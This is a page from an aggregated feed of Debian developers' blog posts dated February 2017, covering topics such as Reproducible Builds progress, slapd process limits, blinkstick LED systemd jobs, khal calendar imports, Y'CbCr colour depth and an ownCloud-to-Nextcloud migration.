I've begun to listen to BBC4's "More Or Less" Podcast. They recently had an episode covering the life and work of Hans Rosling, the inspirational swedish statistician, who has sadly died of pancreatic cancer. It was very moving. Some of Professor Rosling's videos are available to view online. I've heard that they are very much worth watching.

Over the last few months I have also been listening to regular updates by BBC broadcaster Steve Hewlett on his own journey as a cancer sufferer. These were remarkably frank discussions of the ins and outs of his diagnosis, treatment, and the practical consequences on his everyday life. I was very sad to tune in on Monday evening and hear a series of repeated clips from his previous appearances on the PM show, as the implications were clear. And indeed, Steve Hewlett died from oesophagal cancer on Monday. Here's an obituary in the Guardian.




Junichi Uekawa: Trying to use Termux on chromebook.

Wed, 22 Feb 2017 09:42:04 +0000

(image) Trying to use Termux on chromebook. I am exclusively using chromebook for my client side work. Android apps work on this device, and so does Termux. I was pondering how to make things more useful, like using Download directory integration and chrome apps, but not quite got things set up. Then I noticed that it's possible to use sshd on termux. It only accepts public key authentication, but that's enough for me. I can now use my SecureShell chrome app to connect and get things working. Android apps don't support all the keybinds but SecureShell does, which improves my life a bit.




Joey Hess: early spring

Wed, 22 Feb 2017 04:51:11 +0000

(image)

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up.

Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before.

Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed the the cliff earier; seemed to be worst when house voltage was low.)

Soon, 6 months of more power than I can use..

Previously: battery bank refresh late summer the cliff




Shirish Agarwal: The Indian elections hungama

Tue, 21 Feb 2017 23:11:26 +0000

Before I start, I would like to point out #855549 . This is a normal/wishlist bug I have filed against apt, the command-line package manager. I sincerely believe having a history command to know what packages were installed, which were upgraded, which were purged should be easily accessible, easily understood and if the output looks pretty, so much the better. Of particular interest to me is having a list of new packages I have installed in last couple of years after jessie became the stable release. It probably would make for some interesting reading. I dunno how much efforts would be to code something like that, but if it works, it would be the greatest. Apt would have finally arrived. Not that it’s a bad tool, it’s just that it would then make for a heck of a useful tool. Coming back to the topic on hand, Now for the last couple of weeks we don’t have water or rather pressure of water. Water crisis has been hitting Pune every year since 2014 with no end in sight. This has been reported in newspapers addendum but it seems it has been felling on deaf ears. The end result of it is that I have to bring buckets of water from around 50 odd metres. It’s not a big thing, it’s not like some women in some villages in Rajasthan who have to walk in between 200 metres to 5 odd kilometres to get potable water or Darfur, Western Sudan where women are often kidnapped and sold as sexual slaves when they get to fetch water. The situation in Darfur has been shown quite vividly in Darfur is Dying . It is possible that I may have mentioned about Darfur before. While unfortunately the game is in flash as a web resource, the most disturbing part is that the game is extremely depressing, there is a no-win scenario. So knowing and seeing both those scenarios, I can’t complain about 50 metres. BUT….but… when you extrapolate the same data over some more or less 3.3-3.4 million citizens, 3.1 million during 2011 census with a conservative 2.3-2.4 percent population growth rate according to scroll.in. Fortunately or unfortunately, Pune Municipal Corporation elections were held today. Fortunately or unfortunately, this time all the political parties bought majorly unknown faces in these elections. For e.g. I belong to ward 14 which is spread over quite a bit of area and has around 10k of registered voters. Now the unfortunate part of having new faces in elections, you don’t know anything about them. Apart from the affidavits filed, the only thing I come to know is whether there are criminal cases filed against them and what they have shown as their wealth. While I am and should be thankful to ADR which actually is the force behind having the collated data made public. There is a lot of untold story about political push-back by all the major national and regional political parties even when this bit of news were to be made public. It took major part of a decade for such information to come into public domain. But for my purpose of getting clean air and water supply 24×7 to each household seems a very distant dream. I tried to connect with the corporators about a week before the contest and almost all of the lower party functionaries hid behind their political parties manifestos stating they would do the best without any viable plan. For those not knowing, India has been blessed with 6 odd national parties and about 36 odd r[...]



Steinar H. Gunderson: 8-bit Y'CbCr ought to be enough for anyone?

Tue, 21 Feb 2017 22:07:00 +0000

If you take a random computer today, it's pretty much a given that it runs a 24-bit mode (8 bits of each of R, G and B); as we moved from palettized displays at some point during the 90s, we quickly went past 15- and 16-bit and settled on 24-bit. The reasons are simple; 8 bits per channel is easy to work with on CPUs, and it's on the verge of what human vision can distinguish, at least if you add some dither. As we've been slowly taking the CPU off the pixel path and replacing it with GPUs (which has specialized hardware for more kinds of pixels formats), changing formats have become easier, and there's some push to 10-bit (30-bit) “deep color” for photo pros, but largely, 8-bit per channel is where we are. Yet, I'm now spending time adding 10-bit input (and eventually also 10-bit output) to Nageru. Why? The reason is simple: Y'CbCr. Video traditionally isn't done in RGB, but in Y'CbCr; that is, a black-and-white signal (Y) and then two color-difference signals (Cb and Cr, roughly “additional blueness“ and “additional redness”, respectively). We started doing this because it was convenient in analog TV (if you separate the two, black-and-white TVs can just ignore the color signal), but we kept doing it because it's very nice for reducing bandwidth: Human vision is much less sensitive to color than to brightness, so we can transfer the color channels in lower resolution and get away with it. (Also, a typical Bayer sensor can't deliver full color resolution anyway.) So most cameras and video codecs work in Y'CbCr, not RGB. Let's look at the implications of using 8-bit Y'CbCr, using a highly simplified model for, well, simplicity. Let's define Y = 1/3 (R + G + B), Cr = R - Y and Cb = B - Y. (The reverse transformation becomes R = Y + Cr, B = Y + Cb and G = 3Y - R - B.) This means that an RGB color such as pure gray ([127, 127, 127]) becomes [127, 0, 0]. All is good, and Y can go from 0 to 255, just like R, G and B can. A pure red ([255, 0, 0]) becomes [85, 170, 0], and a pure blue ([255, 0, 0]) becomes correspondingly [85, 0, 170]. But we can also have negative Cr and Cb values; a pure yellow ([0, 255, 255]) becomes [170, -170, 85], for instance. So we need to squeeze values from -170 to +170 into an 8-bit range, losing accuracy. Even worse, there are valid Y'CbCr triplets that don't correspond to meaningful RGB colors at all. For instance, Y'CbCr [255, 170, 0] would be RGB [425, 85, 255]; R is out of range! And Y'CbCr [255, -170, 0] would be RGB [85, -85, 255], that is, negative green. This isn't a problem for compression, as we can just avoid using those illegal “colors” with no loss of efficiency. But it means that the conversion in itself causes a loss; actually, if you do the maths on the real formulas (using the BT.601 standard), it turns out only 17% of the 24-bit Y'CbCr code words are valid! In other words, we lose about two and a half bits of data, and our 24 bits of accuracy have been reduced to 21.5. Or, to put it another way; 8-bit Y'CbCr is roughly equivalent to 7-bit RGB. Thus, pretty much all professional video uses 10-bit Y'CbCr. It's much more annoying to deal with (especially when you've got subsampling!), but if you're using SDI, there's not even any 8-bit version defined, so if you insist on 8-bit, you're taking data you're getting on the wire (whether [...]



Reproducible builds folks: Reproducible Builds: week 95 in Stretch cycle

Tue, 21 Feb 2017 18:25:00 +0000

Here's what happened in the Reproducible Builds effort between Sunday February 12 and Saturday February 18 2017: Upcoming Events The Reproducible Build Zoo will be presented by Vagrant Cascadian at the Embedded Linux Conference in Portland, Oregon, February 22nd. Introduction to Reproducible Builds will be presented by Vagrant Cascadian at Scale15x in Pasadena, California, March 5th. Toolchain development and fixes Ximin Luo posted a preliminary spec for BUILD_PATH_PREFIX_MAP, bringing together work and research from previous weeks. Ximin refactored and consolidated much of our existing documentation on both SOURCE_DATE_EPOCH and BUILD_PATH_PREFIX_MAP into one unified page, Standard Environment Variables, with extended discussion on related solutions and how these all fit into people's ideas of what reproducible builds should look like in the long term. The specific pages for each variable still remain, at Timestamps Proposal and Build Path Proposal, only without content that was previously duplicated on both pages. Ximin filed #855282 against devscripts for debsign(1) to support buildinfo files, and wrote an initial series of patches for it with some further additions from Guillem Jover. Packages reviewed and fixed, and bugs filed Chris Lamb: #854999 filed against moin, and forwarded upstream. #855002 filed against samplv1, and forwarded upstream. #855426 filed against fritzing-parts. #855480 filed against examl. Reviews of unreproducible packages 35 package reviews have been added, 1 have been updated and 17 have been removed in this week, adding to our knowledge about identified issues. 1 issue type has been added: nondeterminism_in_java_classes_generated_by_jxc Weekly QA work During our reproducibility testing, the following FTBFS bugs have been detected and reported by: Chris Lamb (2) diffoscope development diffoscope 77 was uploaded to unstable by Mattia Rizzolo. It included contributions from: Chris Lamb: Some fixes to tests and testing config Don't track archive directory locations, a better fix for CVE-2017-0359. Add --exclude option. Closes: #854783 Mattia Rizzolo: Add my key to debian/upstream/signing-key.asc Add CVE-2017-0359 to the changelog of v76 Ximin Luo: When extracting archives, try to keep directory sizes small strip-nondeterminism development strip-nondeterminism 0.031-1 was uploaded to unstable by Chris Lamb. It included contributions from: Chris Lamb: Make the tests less brittle, by not testing for stat(2) blksize and blocks. #854937 strip-nondeterminism 0.031-1~bpo8+1 was uploaded to jessie-backports by Mattia. tests.reproducible-builds.org Vagrant Cascadian and Holger Levsen set up two new armhf nodes, p64b and p64c running on pine64 boards with an arm64 kernel and armhf userland. This introduces kernel variations to armhf. New setup & maintenance jobs were set up too, plus 6 new builder jobs for armhf. Misc. This week's edition was written by Ximin Luo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists. [...]



Jonathan Dowland: Blinkstick and Doom

Tue, 21 Feb 2017 09:20:57 +0000

(image)

I recently implemented VGA "porch" flashing support in Chocolate Doom.

Since I'd spent some time playing with a blinkstick on my NAS, I couldn't resist trying it out with Chocolate Doom too. The result:




Arturo Borrero González: About process limits, round 2

Tue, 21 Feb 2017 08:00:00 +0000

I was wrong. After the other blog post About process limits, some people contacted me with additional data and information. I myself continued to investigate on the issue, so I have new facts. I read again the source code of the slapd daemon and the picture seems clearer now. A new message appeared in the log files: [...] Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024 Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024 Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024 Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024 Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024 [...] This message is clearly produced by the daemon itself, and searching for the string leads to this source code, in servers/slapd/daemon.c: [...] sfd = SLAP_SOCKNEW( s ); /* make sure descriptor number isn't too great */ if ( sfd >= dtblsize ) { Debug( LDAP_DEBUG_ANY, "daemon: %ld beyond descriptor table size %ld\n", (long) sfd, (long) dtblsize, 0 ); tcp_close(s); ldap_pvt_thread_yield(); return 0; } [...] In that same file, dtblsize is set to: [...] #ifdef HAVE_SYSCONF dtblsize = sysconf( _SC_OPEN_MAX ); #elif defined(HAVE_GETDTABLESIZE) dtblsize = getdtablesize(); #else /* ! HAVE_SYSCONF && ! HAVE_GETDTABLESIZE */ dtblsize = FD_SETSIZE; #endif /* ! HAVE_SYSCONF && ! HAVE_GETDTABLESIZE */ [...] If you keep pulling the string, the first two options use system limits to know the value, getrlimit(), and the last one uses a fixed value of 4096 (set at build time). It turns out that this routine slapd_daemon_init() is called once, at daemon startup (see main() function at servers/slapd/main.c). So the daemon is limiting itself to the limit imposed by the system at daemon startup time. That means that our previous limits settings at runtime was not being read by the slapd daemon. Let’s back to the previous approach of establishing the process limits by setting them on the user. The common method is to call ulimit in the init.d script (or systemd service file). One of my concerns of this approach was that slapd runs as a different user, usually openldap. Again, reading the source code: [...] if( check == CHECK_NONE && slapd_daemon_init( urls ) != 0 ) { rc = 1; SERVICE_EXIT( ERROR_SERVICE_SPECIFIC_ERROR, 16 ); goto stop; } #if defined(HAVE_CHROOT) if ( sandbox ) { if ( chdir( sandbox ) ) { perror("chdir"); rc = 1; goto stop; } if ( chroot( sandbox ) ) { perror("chroot"); rc = 1; goto stop; } } #endif #if defined(HAVE_SETUID) && defined(HAVE_SETGID) if ( username != NULL || groupname != NULL ) { slap_init_user( username, groupname ); } #endif [...] So, the slapd daemon first reads the limits and then change user to openldap, (the slap_init_user() function). We can then asume that if we set the limits to the root user, calling ulimit in the init.d script, the slapd daemon will actually inherint them. This is what is originally suggested in debian bug #660917. Let’s use this solution for now. Many thanks to John Hughes john@atlantech.com for the clarifications via email. [...]



Petter Reinholdtsen: Detect OOXML files with undefined behaviour?

Mon, 20 Feb 2017 23:20:00 +0000

I just noticed the new Norwegian proposal for archiving rules in the goverment list ECMA-376 / ISO/IEC 29500 (aka OOXML) as valid formats to put in long term storage. Luckily such files will only be accepted based on pre-approval from the National Archive. Allowing OOXML files to be used for long term storage might seem like a good idea as long as we forget that there are plenty of ways for a "valid" OOXML document to have content with no defined interpretation in the standard, which lead to a question and an idea.

Is there any tool to detect if a OOXML document depend on such undefined behaviour? It would be useful for the National Archive (and anyone else interested in verifying that a document is well defined) to have such tool available when considering to approve the use of OOXML. I'm aware of the officeotron OOXML validator, but do not know how complete it is nor if it will report use of undefined behaviour. Are there other similar tools available? Please send me an email if you know of any such tool.




Ritesh Raj Sarraf: Setting up appliances - the new way

Mon, 20 Feb 2017 18:39:51 +0000

I own a Fitbit Surge. But Fitibit chose to remain exclusive in terms of interoperability. Which means to make any sense out of the data that the watch gathers, you need to stick with what Fitbit mandates. Fair enough in today's trends. It also is part of their business model to restrict useful aspects of the report to Premium Membership.  Again, fair enough in today's business' trends. But a nice human chose to write a bridge; to extract Fitbit data and feed into Google Fit. The project is written in Python, so you can get it to work on most common computer platforms. I never bothered to package this tool for Debian, because I never was sure when I'd throw away the Fitbit. But until that happens, I decided to use the tool to sync my data to Google Fit. Which led me to requirements.txt This project's requirement.txt lists versioned module dependencies, of which many modules in Debian, were either older or newer than what was mentioned in the requirements. To get the tool working, I installed it the pip way. 3 months later, something broke and I needed to revisit the installed modules. At that point, I realized that there's no such thing as: pip upgrade That further led me to dig on why anyone wouldn't add something so simple, because today, in the days of pip, snap, flatpak and dockers, Distributions are predicted to go obsolete and irrelevant. Users should get the SOURCES directly from the developers. But just looking at the date the bug was filed, killed my enthusiasm any further. So, without packaging for Debian, and without installing through pip, I was happy that my init has the ability to create confined and containerized environments, something that I could use to get the job done.   rrs@chutzpah:~$ sudo machinectl login fitbit [sudo] password for rrs: Connected to machine fitbit. Press ^] three times within 1s to exit session. Debian GNU/Linux 9 fitbit pts/0 fitbit login: root Last login: Fri Feb 17 12:44:25 IST 2017 on pts/1 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@fitbit:~# tail -n 25 /var/tmp/lxc/fitbit-google.log synced calories - 1440 data points ------------------------------   2017-02-19  ------------------------- synced steps - 1440 data points synced distance - 1440 data points synced heart_rate - 38215 data points synced weight - 0 logs synced body_fat - 0 logs synced calories - 1440 data points ------------------------------   2017-02-20  ------------------------- synced steps - 1270 data points synced distance - 1270 data points synced heart_rate - 32547 data points synced weight - 0 logs synced body_fat - 0 logs synced calories - 1271 data points Synced 7 exercises between : 2017-02-15 -- 2017-02-20 --------------------------------------------------------------------------                                      Like it ? star the repository : https://github.com/praveendath92/fitbit-googlefit -------------------------------------------------------------------------- [...]



Holger Levsen: How to use .ics files like it's 1997

Mon, 20 Feb 2017 17:46:59 +0000

(image)
$ sudo apt install khal
…
Unpacking khal (0.8.4-3) ...
…
$ (echo 1;echo 0;echo y;echo 0; echo y; echo n; echo y; echo y)  | khal configure
…
Do you want to write the config to /home/user/.config/khal/khal.conf? (Choosing `No` will abort) [y/N]: Successfully wrote configuration to /home/user/.config/khal/khal.conf
$ wget https://anonscm.debian.org/cgit/debconf-data/dc17.git/plain/misc/until-dc17.ics
…
HTTP request sent, awaiting response... 200 OK
Length: 6120 (6.0K) [text/plain]
Saving to: ‘until-dc17.ics’
…
$ khal import --batch -a private until-dc17.ics
$ khal agenda --days 14
Today:
16:30-17:30: DebConf Weekly Meeting ⟳

27-02-2017
16:30-17:30: DebConf Weekly Meeting ⟳

khal is available in stretch and newer and is probably best run from cron piping into '/usr/bin/mail' (image) Thanks to Gunnar Wolf for figuring it all out.




Jonathan Dowland: Blinkenlights, part 3

Mon, 20 Feb 2017 16:31:33 +0000

(image)
(image)

red blinkenlights!

Part three of a series. part 1, part 2.

One morning last week I woke up to find the LED on my NAS a solid red. I've never been happier to have something fail.

I'd set up my backup jobs to fire off a systemd unit on failure

OnFailure=status-email-user@%n.service

This is a generator-service, which is used to fire off an email to me when something goes wrong. I followed these instructions on the Arch wiki to set it up). Once I got the blinkstick, I added an additional command to that service to light up the LED:

ExecStart=-/usr/local/bin/blinkstick --index 1 --limit 50 --set-color red

The actual failure was a simple thing to fix. But I never did get the email.

On further investigation, there are problems with using exim and systemd in Debian at the moment: it's possible for the exim4 daemon to exit and for systemd not to know that this is a failure, thus, the mail spool never gets processed. This should probably be fixed by the exim4 package providing a proper systemd service unit.




Jonathan Dowland: Blinkenlights, part 2

Mon, 20 Feb 2017 16:31:33 +0000

Part two of a series. part 1, part 3. To start with configuring my NAS to use the new blinkenlights, I thought I'd start with a really easy job: I plug in my iPod, a script runs to back it up, then the iPod gets unmounted. It's one of the simpler jobs to start with because the iPod is a simple block device and there's no encryption in play. For now, I'm also going to assume the LED Is going to be used exclusively for this job. In the future I will want many independent jobs to perhaps use the LED to signal things and figuring out how that will work is going to be much harder. I'll skip over the journey and go straight to the working solution. I have a systemd job that is used to invoke a sync from the iPod as follows: [Service] Type=oneshot ExecStart=/bin/mount /media/ipod ExecStart=/usr/local/bin/blinkstick --index 1 --limit 10 --set-color 33c280 ExecStart=/usr/bin/rsync ... ExecStop=/bin/umount /media/ipod ExecStop=/usr/local/bin/blinkstick --index 1 --limit 10 --set-color green [Install] WantedBy=dev-disk-by\x2duuid-A2EA\x2d96ED.device [Unit] OnFailure=blinkstick-fail.service /media/ipod is a classic mount configured in /etc/fstab. I've done this rather than use the newer systemd .mount units which sadly don't give you enough hooks for running things after unmount or in the failure case. This feels quite unnatural, much more "systemdy" would be to Requires= the mount unit, but I couldn't figure out an easy way to set the LED to green after the unmount. I'm sure it's possible, but convoluted. The first blinkstick command sets the LED to a colour to indicate "in progress". I explored some of the blinkstick tool's options for a fading or throbbing colour but they didn't work very well. I'll take another look in the future. After the LED is set, the backup job itself runs. The last blinkstick command, which is only run if the previous umount has succeeded, sets the LED to indicate "safe to unplug". The WantedBy here instructs systemd that when the iPod device-unit is activated, it should activate my backup service. I can refer to the iPod device-unit using this name based on the partition's UUID; this is not the canonical device name that you see if you run systemctl but it's much shorter and crucially its stable, the canonical name depends on exactly where you plugged it in and what other devices might have been connected at the same time. If something fails, a second unit blinkstick-fail.service gets activated. This is very short: [Service] ExecStart=/usr/local/bin/blinkstick --index 1 --limit 50 --set-color red This simply sets the LED to be red. Again it's a bit awkward that in 2 cases I'm setting the LED with a simple Exec but in the third I have to activate a separate systemd service: this seems to be the nature of the beast. At least when I come to look at concurrent jobs all interacting with the LED, the failure case should be simple: red trumps any other activity, user must go and check what's up. [...]



Russ Allbery: Haul via parents

Mon, 20 Feb 2017 02:39:00 +0000

My parents were cleaning out a bunch of books they didn't want, so I grabbed some of the ones that looked interesting. A rather wide variety of random stuff. Also, a few more snap purchases on the Kindle even though I've not been actually finishing books recently. (I do have two finished and waiting for me to write reviews, at least.) Who knows when, if ever, I'll read these.

Mark Ames — Going Postal (nonfiction)
Catherine Asaro — The Misted Cliffs (sff)
Ambrose Bierce — The Complete Short Stores of Ambrose Bierce (collection)
E. William Brown — Perilous Waif (sff)
Joseph Campbell — A Hero with a Thousand Faces (nonfiction)
Jacqueline Carey — Miranda and Caliban (sff)
Noam Chomsky — 9-11 (nonfiction)
Noam Chomsky — The Common Good (nonfiction)
Robert X. Cringely — Accidental Empires (nonfiction)
Neil Gaiman — American Gods (sff)
Neil Gaiman — Norse Mythology (sff)
Stephen Gillet — World Building (nonfiction)
Donald Harstad — Eleven Days (mystery)
Donald Harstad — Known Dead (mystery)
Donald Harstad — The Big Thaw (mystery)
James Hilton — Lost Horizon (mainstream)
Spencer Johnson — The Precious Present (nonfiction)
Michael Lerner — The Politics of Meaning (nonfiction)
C.S. Lewis — The Joyful Christian (nonfiction)
Grigori Medredev — The Truth about Chernobyl (nonfiction)
Tom Nadeu — Seven Lean Years (nonfiction)
Barak Obama — The Audacity of Hope (nonfiction)
Ed Regis — Great Mambo Chicken and the Transhuman Condition (nonfiction)
Fred Saberhagen — Berserker: Blue Death (sff)
Al Sarrantonio (ed.) — Redshift (sff anthology)
John Scalzi — Fuzzy Nation (sff)
John Scalzi — The End of All Things (sff)
Kristine Smith — Rules of Conflict (sff)
Henry David Thoreau — Civil Disobedience and Other Essays (nonfiction)
Alan W. Watts — The Book (nonfiction)
Peter Whybrow — A Mood Apart (nonfiction)

I've already read (and reviewed) American Gods, but didn't own a copy of it, and that seemed like a good book to have a copy of.

The Carey and Brown were snap purchases, and I picked up a couple more Scalzi books in a recent sale.




Norbert Preining: Ryu Murakami – Tokyo Decadence

Mon, 20 Feb 2017 02:08:31 +0000

The other Murakami, Ryu Murakami (村上 龍), is hard to compare to the more famous Haruki. His collection of stories reflects the dark sides of Tokyo, far removed from the happy world of AKB48 and the like. Criminals, prostitutes, depression, loss. A bleak image onto a bleak society. This collection of short stories is a consequent deconstruction of happiness, love, everything we believe to make our lives worthwhile. The protagonists are idealistic students loosing their faith, office ladies on aberrations, drunkards, movie directors, the usual mixture. But the topic remains constant – the unfulfilled search for happiness and love. I felt I was beginning to understand what happiness is about. It isn’t about guzzling ten or twenty energy drinks a day, barreling down the highway for hours at a time, turning over your paycheck to your wife without even opening the envelope, and trying to force your family to respect you. Happiness is based on secrets and lies.Ryu Murakami, It all started just about a year and a half ago A deep pessimistic undertone is echoing through these stories, and the atmosphere and writing reminds of Charles Bukowski. This pessimism resonates in the melancholy of the running themes in the stories, Cuban music. Murakami was active in disseminating Cuban music in Japan, which included founding his own label. Javier Olmo’s pieces are often the connecting parts, as well as lending the short stories their title: Historia de un amor, Se fué. The belief – that what’s missing now used to be available to us – is just an illusion, if you ask me. But the social pressure of “You’ve got everything you need, what’s your problem?” is more powerful than you might ever think, and it’s hard to defend yourself against it. In this country it’s taboo even to think about looking for something more in life.Ryu Murakami, Historia de un amor It is interesting to see that on the surface, the women in the stories are the broken characters, leading feminists to incredible rants about the book, see the rant^Wreview of Blake Fraina at Goodreads: I’ll start by saying that, as a feminist, I’m deeply suspicious of male writers who obsess over the sex lives of women and, further, have the audacity to write from a female viewpoint… …female characters are pretty much all pathetic victims of the male characters… I wish there was absolutely no market for stuff like this and I particularly discourage women readers from buying it…Blake Fraina, Goodreads review On first sight it might look like that the female characters are pretty much all pathetic victims of the male characters, but in fact it is the other way round, the desperate characters, the slaves of their own desperation, are the men, and not the women, in these stories. It is dual to the situation in Hitomi Kanehara’s Snakes and Earrings, where on first sight the tattooist and the outlaw friends are the broken characters, but the really cracked one is the sweet Tokyo girly. Male-female relationships are always in transition. If there’s no f[...]



Gregor Herrmann: RC bugs 2016/52-2017/07

Sun, 19 Feb 2017 22:19:07 +0000

(image)

debian is in deep freeze for the upcoming stretch release. still, I haven't dived into fixing "general" release-critical bugs yet; so far I mostly kept to working on bugs in the debian perl group:

  • #834912 – src:libfile-tee-perl: "libfile-tee-perl: FTBFS randomly (Failed 1/2 test programs)"
    add patch from ntyni (pkg-perl)
  • #845167 – src:lemonldap-ng: "lemonldap-ng: FTBFS randomly (failing tests)"
    upload package prepared by xavier with disabled tests (pkg-perl)
  • #849362 – libstring-diff-perl: "libstring-diff-perl: FTBFS: test failures with new libyaml-perl"
    add patch from ntyni (pkg-perl)
  • #851033 – src:jabref: "jabref: FTBFS: Could not find org.postgresql:postgresql:9.4.1210."
    update maven.rules
  • #851347 – libjson-validator-perl: "libjson-validator-perl: uses deprecated Mojo::Util::slurp, makes libswagger2-perl FTBFS"
    upload new upstream release (pkg-perl)
  • #852853 – src:libwww-curl-perl: "libwww-curl-perl: FTBFS (Cannot find curl.h)"
    add patch for multiarch curl (pkg-perl)
  • #852879 – src:license-reconcile: "license-reconcile: FTBFS: dh_auto_test: perl Build test --verbose 1 returned exit code 255"
    update tests (pkg-perl)
  • #852889 – src:liblatex-driver-perl: "liblatex-driver-perl: FTBFS: Test failures"
    add missing build dependency (pkg-perl)
  • #854859 – lemonldap-ng-doc: "lemonldap-ng-doc: unhandled symlink to directory conversion: /usr/share/doc/lemonldap-ng-doc/pages/documentation/current"
    help with dpkg-maintscript-helper, upload on xavier's behalf (pkg-perl)

thanks to the release team for pro-actively unblocking the packages with fixes which were uploaded after the begin of the freeze!




Steve Kemp: Apologies for the blog-churn.

Sat, 18 Feb 2017 22:00:00 +0000

(image)

I've been tweaking my blog a little over the past few days, getting ready for a new release of the chronicle blog compiler (github).

During the course of that I rewrote all the posts to have 100% lower-case file-paths. Redirection-pages have been auto-generated for each page which was previously mixed-case, but unfortunately that will have meant that the RSS feed updated unnecessarily:

  • If it used to contain:
    • https://example.com/Some_Page.html
  • It would have been updated to contain
    • https://example.com/some_page.html

That triggered a lot of spamming, as the URLs would have shown up as being new/unread/distinct.




Dirk Eddelbuettel: RPushbullet 0.3.1

Sat, 18 Feb 2017 02:17:00 +0000

A new release 0.3.1 of the RPushbullet package, following the recent 0.3.0 release is now on CRAN. RPushbullet is interfacing the neat Pushbullet service for inter-device messaging, communication, and more. It lets you easily send alerts like the one to the to your browser, phone, tablet, ... -- or all at once. This release owes once again a lot to Seth Wenchel who helped to update and extend a number of features. We fixed one more small bug stemming from the RJSONIO to jsonlite transition, and added a few more helpers. We also enabled Travis testing and with it covr-based coverage analysis using pretty much the same setup I described in this recent blog post. Changes in version 0.3.1 (2017-02-17) The target device designation was corrected (#39). Three new (unexported) helper functions test the validity of the api key, device and channel (Seth in #41). The summary method for the pbDevices class was corrected (Seth in #43). New helper functions pbValidateConf, pbGetUser, pbGetChannelInfo were added (Seth in #44 closing #40). New classes pbUser and pbChannelInfo were added (Seth in #44). Travis CI tests (and covr coverage analysis) are now enabled via an encrypted config file (#45). Courtesy of CRANberries, there is also a diffstat report for this release. More details about the package are at the RPushbullet webpage and the RPushbullet GitHub repo. This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings. [...]



Ingo Juergensmann: Migrating from Owncloud 7 on Debian to Nextcloud 11

Fri, 17 Feb 2017 23:19:00 +0000

These days I got a mail by my hosting provider stating that my Owncloud instance is unsecure, because the online scan from scan.nextcloud.com mailed them. However the scan seemed quite bogus: it reported some issues that were listed as already solved in Debians changelog file. But unfortunately the last entry in changelog was on January 5th, 2016. So, there has been more than a whole year without security updates for Owncloud in Debian stable. In an discussion with the Nextcloud team I complained a little bit that the scan/check is not appropriate. The Nextcloud team replied very helpful with additional information, such as two bug reports in Debian to clarify that the Owncloud package will most likely be removed in the next release: #816376 and #822681. So, as there is no nextcloud package in Debian unstable as of now, there was no other way to manually upgrade & migrate to Nextcloud. This went fairly well: ownCloud 7 -> ownCloud 8.0 -> ownCloud 8.1 -> ownCloud 8.2 -> ownCloud 9.0 -> ownCloud 9.1 -> Nextcloud 10 -> Nextcloud 11 There were some smaller caveats: When migrating from OC 9.0 to OC 9.1 you need to migrate your addressbooks and calendars as described in the OC 9.0 Release Notes When migrating from OC 9.1 to Nextcloud 10, the OC 9.1 is higher than expected by the Mextcloud upgrade script, so it warns about that you can't downgrade your installation. The fix was simply to change the OC version in the config.php The Documents App of OC 7 is no longer available in Nextcloud 11 and is replaced by Collabora App, which is way more complex to setup The installation and setup of the Docker image for collabora/code was the main issue, because I wanted to be able to edit documents in my cloud. For some reason Nextcloud couldn't connect to my docker installation. After some web searches I found "Can't connect to Collabora Online" which led me to the next entry in the Nextcloud support forum. But in the end it was this posting that finally made it work for me. So, in short I needed to add... DOCKER_OPTS="--storage-driver=devicemapper" to /etc/default/docker. So, in the end everything worked out well and my cloud instance is secure again. :-) UPDATE 2016-02-18 10:52:Sadly with that working Collabora Online container from Docker I now face this issue of zombie processes for loolforkit inside of that container. Kategorie: DebianTags: DebianSoftwareCloudServer  [...]



Michal Čihař: What's coming in Weblate 2.12

Fri, 17 Feb 2017 11:00:25 +0000

(image)

Weblate should be released by end of February, so it's now pretty much clear what will be there. So let's look at some of the upcoming features.

There were many improvements in search related features. They got performance improvements (this is especially noticeable on site wide search). Additionally you can search for strings within translation project. On related topic, search and replace is now available for component or project wide operations, what can help you in case of massive renaming in your translations.

We have worked on improving machine translations as well, this time we've added support for Yandex. In case you know some machine translation service which we do not yet support, please submit that to our issue tracker.

Biggest improvement so far comes for visual context feature - it allows you to upload screenshots which are later shown to translators to give them better idea where and in which context the translation is used. So far you had to manually upload screenshot for every source string, what was far from being easy to use. With Weblate 2.12 (and this is already available on Hosted Weblate right now) the screenshots management got way better.

There is now separate interface to manage screenshots (see screenshots for Weblate as an example), you can assign every screenshot to multiple source strings, however you can also let Weblate automatically recognize texts on the screenshots using OCR and suggest strings to assign. This can save you quite a lot of effort, especially with screenshots with lot of strings. This feature is still in early phase, so the suggestions are not always 100% matching, but we're working to improve it further.

There will be some more features as well, you can look at our 2.12 milestone at GitHub to follow the process.

Filed under: Debian English SUSE Weblate | 0 comments




Joey Hess: Presenting at LibrePlanet 2017

Fri, 17 Feb 2017 03:56:05 +0000

(image)

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!)

After attending for four years, I finally thought it was time to perhaps speak at it.

Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the  Free Software Awards and discuss pressing threats and important opportunities for software freedom.

